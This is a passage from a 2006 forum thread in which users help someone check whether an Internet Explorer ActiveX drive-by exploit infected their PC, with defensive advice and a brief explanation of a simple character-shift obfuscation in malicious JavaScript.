    >> exploits work again. Even aside from that, just invoking an ActiveX control
    >> without any possibility to access its scripting, can have devastating side
    >> effects - f.e. invoking TlntSrv.TlntClientEnum (not safe for scripting)
    >> made Windows 2000 Server SP3 start the Telnet Server Service if installed.

    >
    > Now I'm getting scared...So how can I be sure there isn't any nasty
    > stuff on my computer as a result of this?


    You could start by looking for those files mentioned in the exploits
    (u.exe, d.exe and tm.exe), although sometimes the malware will delete
    the initial files once it's installed.

    > I've run a full antivirus
    > check, a full antispyware check and a full anti-trojan check using
    > Trojan Hunter and these programs at least say I'm clean. I am fully
    > patched up (I always install the updates as soon as they become
    > available). And I've run netstat and it doesn't show any strange
    > internet connections and my firewall doesn't show any strange
    > connections though of course it could be piggy-backing on another
    > program.


    If there's no unusual activity you are probably ok, but unless you're
    very familiar with your system the only sure way is to reformat the HD
    and reinstall the OS.

    There's now an 'ADODB.connection' vulnerability which has just been
    discovered. See http://isc.sans.org/diary.php?storyid=1807

    Next time you use IE on the Internet, be sure to disable ActiveX
    completely.
    Ant, Oct 29, 2006
    #17
  18. Ant wrote:

    > Next time you use IE on the Internet, be sure to disable ActiveX
    > completely.


    Doesn't matter. There are various unpatched buffer overflows which can be
    triggered without any ActiveX or Scripting. In any case, you're pissed off.
    Sebastian Gottschalk, Oct 29, 2006
    #18
  19. Wong Yung

    Ant Guest

    "Sebastian Gottschalk" wrote:

    > Ant wrote:
    >> Next time you use IE on the Internet, be sure to disable ActiveX
    >> completely.

    >
    > Doesn't matter. There are various unpatched buffer overflows which can be
    > triggered without any ActiveX or Scripting.


    Well, that doesn't surprise me.

    > In any case, you're pissed off.


    What do you mean by that? I'm quite content, thanks.
    Ant, Oct 29, 2006
    #19
  20. Wong Yung

    erewhon Guest


    >>
    >>
    >> Is there any tool I can use to work out what the URL is from this?

    >
    > It's javascript so a web browser is all you need.
    >
    > It's a rot 4 encoding if you will. It's just taking each of the
    > characters of that string s and subtracting 4 from it
    > i.e. s.charCodeAt(i)-4


    Can you explain the process/tools you use? I'm no code head but am
    impressed by this type of work.
    erewhon, Oct 29, 2006
    #20
